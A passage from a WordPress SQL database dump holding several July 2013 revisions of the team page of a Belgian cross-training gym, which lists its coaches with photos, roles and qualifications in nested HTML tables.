style=\"border: 1px; padding: 5px;\">\r\n<h2>Julien Meulemans</h2>\r\nCoatch</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>', 'L\'équipe', '', 'inherit', 'open', 'open', '', '20-revision-v1', '', '', '2013-07-03 19:39:55', '2013-07-03 19:39:55', '', 20, 'http://www.crosstrainingcenter.be/?p=244', 0, 'revision', '', 0),
(245, 1, '2013-07-03 19:41:42', '2013-07-03 19:41:42', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julie_pierrard-pti.jpg\"><img class=\" wp-image-235 alignleft\" alt=\"julie_pierrard-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julie_pierrard-pti.jpg\" width=\"162\" height=\"211\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julie Pierrard</h2>\r\nGérante\r\nCoatch\r\nDiététicienne</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/damien_pierrard-pti.jpg\"><img class=\" wp-image-233 alignleft\" alt=\"damien_pierrard-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/damien_pierrard-pti.jpg\" width=\"180\" height=\"234\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Damien Pierrard</h2>\r\nFormateur\r\nCoatch</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/guelor-pti.jpg\"><img class=\" wp-image-234 alignleft\" alt=\"guelor-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/guelor-pti.jpg\" width=\"180\" height=\"235\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Guélor Luabeya</h2>\r\nFormateur\r\nCoatch</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/mathieu_gille-pti.jpg\"><img class=\" wp-image-237 alignleft\" alt=\"mathieu_gille-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/mathieu_gille-pti.jpg\" width=\"180\" height=\"233\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Matthieu Gille</h2>\r\nCoatch</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/bertrand_bauwin-pti.jpg\"><img class=\" wp-image-232 alignleft\" alt=\"bertrand_bauwin-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/bertrand_bauwin-pti.jpg\" width=\"180\" height=\"234\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Bertrand Bauwin</h2>\r\n<h5>Coatch</h5>\r\n<ul>\r\n	<li>Baccalauréat en éducation physique</li>\r\n	<li>Spécialisation en psychomotricité</li>\r\n	<li>Préparateur physique et entraineur de football diplômé de l’URBSFA</li>\r\n	<li>Enseignant en éducation physique</li>\r\n	<li>Pratiquant de foot, triathlon, tennis et VTT</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julien_meulemans-pti.jpg\"><img class=\" wp-image-236 alignleft\" alt=\"julien_meulemans-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julien_meulemans-pti.jpg\" width=\"180\" height=\"234\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julien Meulemans</h2>\r\n<h5>Coatch</h5>\r\n<ul>\r\n	<li>Baccalauréat en éducation physique</li>\r\n	<li>Maitre psychomotricien</li>\r\n	<li>Formation de personal trainer</li>\r\n	<li>Formation en Streching Global Actif (SGA)</li>\r\n	<li>Formation à l’initiation au golf et snag golf</li>\r\n	<li>Enseignant en éducation physique</li>\r\n	<li>Pratiquant de foot et de ski</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>', 'L\'équipe', '', 'inherit', 'open', 'open', '', '20-revision-v1', '', '', '2013-07-03 19:41:42', '2013-07-03 19:41:42', '', 20, 'http://www.crosstrainingcenter.be/?p=245', 0, 'revision', '', 0),
(246, 1, '2013-07-03 19:42:52', '2013-07-03 19:42:52', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julie_pierrard-pti.jpg\"><img class=\" wp-image-235 alignleft\" alt=\"julie_pierrard-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julie_pierrard-pti.jpg\" width=\"97\" height=\"127\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julie Pierrard</h2>\r\nGérante\r\nCoatch\r\nDiététicienne</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/damien_pierrard-pti.jpg\"><img class=\" wp-image-233 alignleft\" alt=\"damien_pierrard-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/damien_pierrard-pti.jpg\" width=\"108\" height=\"140\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Damien Pierrard</h2>\r\nFormateur\r\nCoatch</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/guelor-pti.jpg\"><img class=\" wp-image-234 alignleft\" alt=\"guelor-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/guelor-pti.jpg\" width=\"108\" height=\"141\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Guélor Luabeya</h2>\r\nFormateur\r\nCoatch</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/mathieu_gille-pti.jpg\"><img class=\" wp-image-237 alignleft\" alt=\"mathieu_gille-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/mathieu_gille-pti.jpg\" width=\"108\" height=\"140\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Matthieu Gille</h2>\r\nCoatch</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/bertrand_bauwin-pti.jpg\"><img class=\" wp-image-232 alignleft\" alt=\"bertrand_bauwin-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/bertrand_bauwin-pti.jpg\" width=\"108\" height=\"140\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Bertrand Bauwin</h2>\r\n<h5>Coatch</h5>\r\n<ul>\r\n	<li>Baccalauréat en éducation physique</li>\r\n	<li>Spécialisation en psychomotricité</li>\r\n	<li>Préparateur physique et entraineur de football diplômé de l’URBSFA</li>\r\n	<li>Enseignant en éducation physique</li>\r\n	<li>Pratiquant de foot, triathlon, tennis et VTT</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julien_meulemans-pti.jpg\"><img class=\" wp-image-236 alignleft\" alt=\"julien_meulemans-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julien_meulemans-pti.jpg\" width=\"108\" height=\"140\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julien Meulemans</h2>\r\n<h5>Coatch</h5>\r\n<ul>\r\n	<li>Baccalauréat en éducation physique</li>\r\n	<li>Maitre psychomotricien</li>\r\n	<li>Formation de personal trainer</li>\r\n	<li>Formation en Streching Global Actif (SGA)</li>\r\n	<li>Formation à l’initiation au golf et snag golf</li>\r\n	<li>Enseignant en éducation physique</li>\r\n	<li>Pratiquant de foot et de ski</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>', 'L\'équipe', '', 'inherit', 'open', 'open', '', '20-revision-v1', '', '', '2013-07-03 19:42:52', '2013-07-03 19:42:52', '', 20, 'http://www.crosstrainingcenter.be/?p=246', 0, 'revision', '', 0),
(247, 1, '2013-07-03 19:44:26', '2013-07-03 19:44:26', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julie_pierrard-pti.jpg\"><img class=\" wp-image-235 alignleft\" alt=\"julie_pierrard-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julie_pierrard-pti.jpg\" width=\"97\" height=\"127\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julie Pierrard</h2>\r\nGérante\r\nCoatch\r\nDiététicienne</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/damien_pierrard-pti.jpg\"><img class=\" wp-image-233 alignleft\" alt=\"damien_pierrard-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/damien_pierrard-pti.jpg\" width=\"108\" height=\"140\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Damien Pierrard</h2>\r\nFormateur\r\nCoatch</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/guelor-pti.jpg\"><img class=\" wp-image-234 alignleft\" alt=\"guelor-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/guelor-pti.jpg\" width=\"108\" height=\"141\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Guélor Luabeya</h2>\r\nFormateur\r\nCoatch</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/mathieu_gille-pti.jpg\"><img class=\" wp-image-237 alignleft\" alt=\"mathieu_gille-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/mathieu_gille-pti.jpg\" width=\"108\" height=\"140\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Matthieu Gille</h2>\r\nCoatch</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/bertrand_bauwin-pti.jpg\"><img class=\" wp-image-232 alignleft\" alt=\"bertrand_bauwin-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/bertrand_bauwin-pti.jpg\" width=\"108\" height=\"140\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Bertrand Bauwin</h2>\r\n<h5>Coatch</h5>\r\n<ul>\r\n	<li>Baccalauréat en éducation physique</li>\r\n	<li>Spécialisation en psychomotricité</li>\r\n	<li>Préparateur physique et entraineur de football diplômé de l’URBSFA</li>\r\n	<li>Enseignant en éducation physique</li>\r\n	<li>Pratiquant de foot, triathlon, tennis et VTT</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julien_meulemans-pti.jpg\"><img class=\" wp-image-236 alignleft\" alt=\"julien_meulemans-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julien_meulemans-pti.jpg\" width=\"108\" height=\"140\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julien Meulemans</h2>\r\n<h5>Coatch</h5>\r\n<ul>\r\n	<li>Baccalauréat en éducation physique</li>\r\n	<li>Maitre psychomotricien</li>\r\n	<li>Formation de personal trainer</li>\r\n	<li>Formation en Streching Global Actif (SGA)</li>\r\n	<li>Formation à l’initiation au golf et snag golf</li>\r\n	<li>Enseignant en éducation physique</li>\r\n	<li>Pratiquant de foot et de ski</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>', 'L\'équipe', '', 'inherit', 'open', 'open', '', '20-revision-v1', '', '', '2013-07-03 19:44:26', '2013-07-03 19:44:26', '', 20, 'http://www.crosstrainingcenter.be/?p=247', 0, 'revision', '', 0),
(248, 1, '2013-07-03 19:47:43', '2013-07-03 19:47:43', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julie_pierrard-pti.jpg\"><img class=\" wp-image-235 alignleft\" alt=\"julie_pierrard-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julie_pierrard-pti.jpg\" width=\"97\" height=\"127\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julie Pierrard</h2>\r\nGérante\r\nCoatch\r\nDiététicienne</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/damien_pierrard-pti.jpg\"><img class=\" wp-image-233 alignleft\" alt=\"damien_pierrard-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/damien_pierrard-pti.jpg\" width=\"108\" height=\"140\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Damien Pierrard</h2>\r\nFormateur\r\nCoatch</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/guelor-pti.jpg\"><img class=\" wp-image-234 alignleft\" alt=\"guelor-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/guelor-pti.jpg\" width=\"108\" height=\"141\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Guélor Luabeya</h2>\r\n<h5>Fondateur GLFE consulting Formateur coach</h5>\r\n<h5>Coach</h5>\r\n<ul>\r\n	<li>Instructeur de cours collectifs LES MILLS, présenteur international et formateur national</li>\r\n	<li>Premier Trainer National Belge</li>\r\n	<li>Personal trainer (formation Direct Fitness et Les Mills Coach) expert en kettlelbell, VIPR, Body Boxe et TRX</li>\r\n	<li>Ancien footballeur semi-professionnel et passionné de sports de combat</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/mathieu_gille-pti.jpg\"><img class=\" wp-image-237 alignleft\" alt=\"mathieu_gille-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/mathieu_gille-pti.jpg\" width=\"108\" height=\"140\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Matthieu Gille</h2>\r\n<h5>Coach</h5>\r\n<ul>\r\n	<li>Préparateur physique en sport collectif et individuel</li>\r\n	<li>Brevet A de l’URBSFA</li>\r\n	<li>Pratiquant de foot, triathlon, tennis et golf</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/bertrand_bauwin-pti.jpg\"><img class=\" wp-image-232 alignleft\" alt=\"bertrand_bauwin-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/bertrand_bauwin-pti.jpg\" width=\"108\" height=\"140\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Bertrand Bauwin</h2>\r\n<h5>Coatch</h5>\r\n<ul>\r\n	<li>Baccalauréat en éducation physique</li>\r\n	<li>Spécialisation en psychomotricité</li>\r\n	<li>Préparateur physique et entraineur de football diplômé de l’URBSFA</li>\r\n	<li>Enseignant en éducation physique</li>\r\n	<li>Pratiquant de foot, triathlon, tennis et VTT</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julien_meulemans-pti.jpg\"><img class=\" wp-image-236 alignleft\" alt=\"julien_meulemans-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julien_meulemans-pti.jpg\" width=\"108\" height=\"140\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julien Meulemans</h2>\r\n<h5>Coatch</h5>\r\n<ul>\r\n	<li>Baccalauréat en éducation physique</li>\r\n	<li>Maitre psychomotricien</li>\r\n	<li>Formation de personal trainer</li>\r\n	<li>Formation en Streching Global Actif (SGA)</li>\r\n	<li>Formation à l’initiation au golf et snag golf</li>\r\n	<li>Enseignant en éducation physique</li>\r\n	<li>Pratiquant de foot et de ski</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>', 'L\'équipe', '', 'inherit', 'open', 'open', '', '20-revision-v1', '', '', '2013-07-03 19:47:43', '2013-07-03 19:47:43', '', 20, 'http://www.crosstrainingcenter.be/?p=248', 0, 'revision', '', 0);
INSERT INTO `www2_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(249, 1, '2013-07-03 19:48:41', '2013-07-03 19:48:41', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julie_pierrard-pti.jpg\"><img class=\" wp-image-235 alignleft\" alt=\"julie_pierrard-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julie_pierrard-pti.jpg\" width=\"97\" height=\"127\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julie Pierrard</h2>\r\nGérante\r\nCoatch\r\nDiététicienne</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/damien_pierrard-pti.jpg\"><img class=\" wp-image-233 alignleft\" alt=\"damien_pierrard-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/damien_pierrard-pti.jpg\" width=\"108\" height=\"140\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Damien Pierrard</h2>\r\nFormateur\r\nCoatch</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/guelor-pti.jpg\"><img class=\" wp-image-234 alignleft\" alt=\"guelor-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/guelor-pti.jpg\" width=\"108\" height=\"141\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Guélor Luabeya</h2>\r\n<h5>Fondateur GLFE consulting<br>\r\nFormateur coach<br>\r\nCoach</h5>\r\n<ul>\r\n	<li>Instructeur de cours collectifs LES MILLS, présenteur international et formateur national</li>\r\n	<li>Premier Trainer National Belge</li>\r\n	<li>Personal trainer (formation Direct Fitness et Les Mills Coach) expert en kettlelbell, VIPR, Body Boxe et TRX</li>\r\n	<li>Ancien footballeur semi-professionnel et passionné de sports de combat</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/mathieu_gille-pti.jpg\"><img class=\" wp-image-237 alignleft\" alt=\"mathieu_gille-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/mathieu_gille-pti.jpg\" width=\"108\" height=\"140\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Matthieu Gille</h2>\r\n<h5>Coach</h5>\r\n<ul>\r\n	<li>Préparateur physique en sport collectif et individuel</li>\r\n	<li>Brevet A de l’URBSFA</li>\r\n	<li>Pratiquant de foot, triathlon, tennis et golf</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/bertrand_bauwin-pti.jpg\"><img class=\" wp-image-232 alignleft\" alt=\"bertrand_bauwin-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/bertrand_bauwin-pti.jpg\" width=\"108\" height=\"140\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Bertrand Bauwin</h2>\r\n<h5>Coatch</h5>\r\n<ul>\r\n	<li>Baccalauréat en éducation physique</li>\r\n	<li>Spécialisation en psychomotricité</li>\r\n	<li>Préparateur physique et entraineur de football diplômé de l’URBSFA</li>\r\n	<li>Enseignant en éducation physique</li>\r\n	<li>Pratiquant de foot, triathlon, tennis et VTT</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a 